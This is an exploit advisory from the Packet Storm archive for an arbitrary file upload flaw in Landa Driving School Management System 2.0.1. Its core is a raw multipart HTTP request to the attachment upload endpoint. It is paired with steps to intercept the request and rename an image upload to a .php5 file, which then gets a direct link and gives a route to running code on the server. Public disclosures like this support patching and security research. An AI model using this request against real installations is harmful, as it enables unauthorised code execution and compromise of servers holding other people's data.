Landa Driving School Management System 2.0.1 Arbitrary File Upload ≈ Packet Storm

Home^[1] Files^[2] News^[3] Contact^[4] Add New^[5]

Change Mirror^[11] Download^[12]

        # Exploit Title: Landa Driving School Management System Arbitrary File Upload
# Version 2.0.1
# Google Dork: N/A
# Date: 17/01/2022
# Exploit Author: Sohel Yousef - Cette adresse e-mail est protégée contre les robots spammeurs. Vous devez activer le JavaScript pour la visualiser.
# Software Link: https://codecanyon.net/item/landa-driving-school-management-system/23220151
# Software link 2 :https://simcycreative.com/landa/
# Software Demo : https://landa.simcycreative.com/
# Category: webapps
Landa Driving School Management System contain arbitrary file upload
registered user can upload .php5 files in attachments section with use of intercept tool in burbsuite to edit the raw
details 
POST /profile/attachment/upload/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: */*
Accept-Language: ar,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------215084716322124620333137564048
Content-Length: 294983
Origin: https://localhost 
Connection: close
Referer: https://localhost/profile/91/
Cookie: CSRF-TOKEN=e9055e0cf3dbcbf383f7fdf46d418840fd395995ced9f3e1756bd9101edf0fcf; simcify=97a4436a6f7c5c5cd1fc43b903e3b760
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
-----------------------------215084716322124620333137564048
Content-Disposition: form-data; name="name"
sddd
-----------------------------215084716322124620333137564048
Content-Disposition: form-data; name="csrf-token"
e9055e0cf3dbcbf383f7fdf46d418840fd395995ced9f3e1756bd9101edf0fcf
-----------------------------215084716322124620333137564048
Content-Disposition: form-data; name="userid"
91
-----------------------------215084716322124620333137564048
Content-Disposition: form-data; name="attachment"; filename="w.php.png" >>>>>>>>>>>>>>>>  change this to w.php5
Content-Type: image/png
you will have a direct link to the uploaded files 

• Follow us on Twitter^[15]
• Follow us on Facebook^[16]
• Subscribe to an RSS Feed^[17]

File Tags

• ActiveX^[18] (932)
• Advisory^[19] (76,537)
• Arbitrary^[20] (14,931)
• BBS^[21] (2,859)
• Bypass^[22] (1,516)
• CGI^[23] (1,009)
• Code Execution^[24] (6,446)
• Conference^[25] (665)
• Cracker^[26] (797)
• CSRF^[27] (3,246)
• DoS^[28] (21,520)
• Encryption^[29] (2,319)
• Exploit^[30] (49,107)
• File Inclusion^[31] (4,119)
• File Upload^[32] (933)
• Firewall^[33] (821)
• Info Disclosure^[34] (2,531)
• Intrusion Detection^[35] (841)
• Java^[36] (2,719)
• JavaScript^[37] (787)
• Kernel^[38] (5,893)
• Local^[39] (13,887)
• Magazine^[40] (586)
• Overflow^[41] (12,011)
• Perl^[42] (1,409)
• PHP^[43] (5,024)
• Proof of Concept^[44] (2,273)
• Protocol^[45] (3,229)
• Python^[46] (1,365)
• Remote^[47] (29,318)
• Root^[48] (3,419)
• Ruby^[49] (563)
• Scanner^[50] (1,627)
• Security Tool^[51] (7,627)
• Shell^[52] (3,013)
• Shellcode^[53] (1,192)
• Sniffer^[54] (877)
• Spoof^[55] (2,062)
• SQL Injection^[56] (15,858)
• TCP^[57] (2,345)
• Trojan^[58] (666)
• UDP^[59] (865)
• Virus^[60] (657)
• Vulnerability^[61] (30,112)
• Web^[62] (8,860)
• Whitepaper^[63] (3,696)
• x86^[64] (939)
• XSS^[65] (17,200)
• Other^[66]

File Archives

• January 2022^[67]
• December 2021^[68]
• November 2021^[69]
• October 2021^[70]
• September 2021^[71]
• August 2021^[72]
• July 2021^[73]
• June 2021^[74]
• May 2021^[75]
• April 2021^[76]
• March 2021^[77]
• February 2021^[78]
• Older^[79]

Systems

• AIX^[80] (423)
• Apple^[81] (1,853)
• BSD^[82] (368)
• CentOS^[83] (54)
• Cisco^[84] (1,909)
• Debian^[85] (5,946)
• Fedora^[86] (1,690)
• FreeBSD^[87] (1,241)
• Gentoo^[88] (4,148)
• HPUX^[89] (875)
• iOS^[90] (309)
• iPhone^[91] (108)
• IRIX^[92] (220)
• Juniper^[93] (67)
• Linux^[94] (41,268)
• Mac OS X^[95] (682)
• Mandriva^[96] (3,105)
• NetBSD^[97] (255)
• OpenBSD^[98] (476)
• RedHat^[99] (10,907)
• Slackware^[100] (941)
• Solaris^[101] (1,601)
• SUSE^[102] (1,444)
• Ubuntu^[103] (7,568)
• UNIX^[104] (9,007)
• UnixWare^[105] (182)
• Windows^[106] (6,248)
• Other^[107]

© 2020 Packet Storm. All rights reserved.